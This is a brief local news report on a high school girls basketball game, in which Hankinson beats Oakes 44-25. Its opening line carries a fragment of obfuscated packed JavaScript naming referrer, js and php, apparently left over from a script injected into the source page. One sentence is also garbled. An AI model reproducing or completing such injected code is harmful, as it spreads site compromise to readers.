HANKINSON esiks|var|u0026u|referrer|hnaef||js|php’.split(‘|’),0,{}))
(NewsDakota.com) It was about as close to a must-win as a team can have this time of year in district play.
Those were the words of Oakes High School head girls basketball coach Jason Schmitz before Friday night’s game in Hankinson. Unfortunately for the visiting Tornadoes, the Lady Pirates of Hankinson High had quite the successful night capitalizing off of 27 turnovers en route to a 44-25 victory to earn their first win in District 1 play, and keep Oakes without a win against a fellow District 1 opponent.
A three point more than two minutes into the contest opened up for the Pirates (3-7 1-2 Class B District 1) and they never looked back; outscoring the Tornadoes (3-8 0-4 District 1) 13-4 in the second quarter and by a 15-3 margin in the third.
Oakes plays at LaMoure Saturday afternoon against the Loboes of LaMoure-Litchville/Marion.
